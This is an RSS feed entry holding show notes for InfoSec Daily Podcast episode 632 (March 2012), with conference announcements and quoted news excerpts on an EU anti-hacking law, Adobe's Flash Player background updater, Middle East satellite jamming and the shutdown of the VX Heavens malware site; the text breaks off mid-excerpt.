		<link>http://www.isdpodcast.com/episode-632-parliament-fail-adobe-updater-satellite-jamming-vx-heavens-and-account-reporting</link>
		<comments>http://www.isdpodcast.com/episode-632-parliament-fail-adobe-updater-satellite-jamming-vx-heavens-and-account-reporting#comments</comments>
		<pubDate>Fri, 30 Mar 2012 00:59:34 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3703</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 632 for March 29, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan. &#160; Announcements: InfoSec Southwest When: March 30-April 1, 2012 Where: Austin, Texas http://www.Infosecsouthwest.com &#160; Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 632 for March 29, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1, 2012<br class="kix-line-break" /><br />
	Where: Austin, Texas<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
	</span><a href="http://www.outerz0ne.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.europarl.europa.eu/news/en/pressroom/content/20120326IPR41843/html/Hacking-IT-systems-to-become-a-criminal-offence"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.europarl.europa.eu/news/en/pressroom/content/20120326IPR41843/html/Hacking-IT-systems-to-become-a-criminal-offence</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cyber attacks on IT systems would become a criminal offence punishable by at least two years in prison throughout the EU under a draft law backed by the Civil Liberties Committee on Tuesday. Possessing or distributing hacking software and tools would also be an offence, and companies would be liable for cyber attacks committed for their benefit.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The proposal, which would update existing EU legislation on cyber attacks, was approved with by 50 votes in favour, 1 against and 3 abstentions.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We are dealing here with serious criminal attacks, some of which are even conducted by criminal organisations. The financial damage caused for companies, private users and the public side amounts to several billions each year&quot; said rapporteur Monika Hohlmeier (EPP, DE). &quot;No car manufacturer may send a car without a seatbelt into the streets. And if this happens, the company will be held liable for any damage. These rules must also apply in the virtual world&quot; she added.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blogs.adobe.com/asset/2012/03/an-update-for-the-flash-player-updater.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.adobe.com/asset/2012/03/an-update-for-the-flash-player-updater.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today&rsquo;s release of Flash Player contains a new background updater. This new background updater will allow Windows users to choose an automatic update option for future Flash Player updates.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you read this September 2011 CSIS report, then you saw that 99.8 percent of malware installs through exploit kits are targeting out-of-date software installations. This point was reiterated recently in volume 11 of the Microsoft Security Intelligent Report. Also, attackers have been taking advantage of users trying to manually search for Flash Player updates by buying ads on search engines pretending to be legitimate Flash Player download sites. Improving the update process is probably the single most important challenge we can tackle for our customers at this time.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Overview of the background updater design</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A full technical description of the new background updater design is available on DevNet, but here are the highlights:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After a successful installation of Adobe Flash Player 11.2, users will be presented with a dialog box to choose an update method. The following three update options are available to users:</span></p>
<ul style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Install updates automatically when available (recommended)</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Notify me when updates are available</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Never check for updates (not recommended)</span></p>
</li>
</ul>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For our initial release, we have set the new background updater to check for updates once an hour until it gets a response from Adobe. If the response says there is no new update, then it will wait 24 hours before checking again. We accomplish this through the Windows Task Scheduler to avoid running a background service on the system. If you are running multiple browsers on your system, the background updater will update every browser. This will solve the problem of end-users having to update Flash Player for Internet Explorer separately from Flash Player for their other open-source browsers. Google Chrome users, who have the integrated Flash Player, will still be updated through the Chrome update system.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://arstechnica.com/science/news/2012/03/satellite-jamming-becoming-a-big-problem-in-the-middle-east.ars"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/science/news/2012/03/satellite-jamming-becoming-a-big-problem-in-the-middle-east.ars</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Arab Spring has had yet another consequence&mdash;satellite jamming, and the practice is serious enough to threaten the satellite operators&#39; business. Two operators, Arabsat and Nilesat, complained about the jamming in the Satellite 2012 Conference in Washington, D.C. last week, according to an</span><a href="http://www.spacenews.com/policy/120323-jamming-middle-east-sat-operators.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> article</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in Space News. Arabsat is a 21-country consortium that provides broadcasting to over 100 countries in the Middle East, Africa, and Europe. Nilesat is an Egypt-based operator that carries 415 channels to the Middle East and North Africa. The satellites also provide broadband, telephone, and</span><a href="http://en.wikipedia.org/wiki/Very-small-aperture_terminal"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> VSAT service</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jamming and rounding up satellite dishes has become a common practice for governments wishing to limit unfavorable coverage in their own (or sometimes other people&#39;s) countries. An</span><a href="http://broadcastengineering.com/news/EBU-ITU-satellite-jamming/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> article</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in February at BroadcastEngineering.com detailed the decision of the United Nations&#39; International Telecommunications Union (ITU) to condemn satellite jamming in Iran as &quot;contrary to</span><a href="http://www.un.org/en/documents/udhr/index.shtml#a19"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Article 19</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of the Universal Declaration of Human Rights.&quot; That decision came after complaints by several broadcasters, including the BBC, Radio Netherlands Worldwide, and Voice of America. Last year Reuters</span><a href="http://af.reuters.com/article/libyaNews/idAFLDE71N2CU20110224"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> reported</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that jamming of satellite phones and other services occurred in Libya during the uprising. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But the issue may not be limited to Middle East governments. The Islamic Republic of Iran&#39;s</span><a href="http://english.irib.ir/news/political/item/88986-jamming-signals-disrupt-irib-broadcast-on-hotbird"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Broadcasting English website</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> claimed in January that British technicians were jamming Iranian broadcasts on Eutelsat&#39;s Hotbird sat network from a site in Bahrain. If that&#39;s accurate, it may suggest that European governments think it&#39;s acceptable to jam European companies&#39; satellites as long as the broadcasts themselves aren&#39;t European.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Any attempt to jam satellites in the United States is generally tracked and stopped quickly by the Federal Communications Commission (FCC), which strictly enforces the licensing and sharing of US radio spectrum by the many parties that use it. Off-frequency or overpowered broadcasts in the United States generally result in an instant broadcaster shutdown and possible fines or jail terms.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.sectechno.com/2012/03/28/vx-heavens-malware-sharing-site-closed/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sectechno.com/2012/03/28/vx-heavens-malware-sharing-site-closed/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today VX Heavens a widely known and old malware research portal goes down, the website contain a useful documentation about all kind malwares but beside all that the forum contain a virus exchange portal where users and moderators share different viruses and malwares.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The share of malwares is illegal that&rsquo;s why the Ukrainian police stopped this resource, we previously posted about VX Heavens as a zoo of malwares because we can find some samples that are really old and we cannot find it anymore, this have been somehow useful for learning about different viruses.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I think that sharing malware for learning purposes is important but some criminals are using these software&rsquo;s as a weapon for attacking other cyber users or making money by stealing sensitive information so here we feel that it is important to shut down all type of malware share as we have no idea in which hand they are going to be and for which objective they are required.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Currently the website displays the following message:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dear friends</span></p>
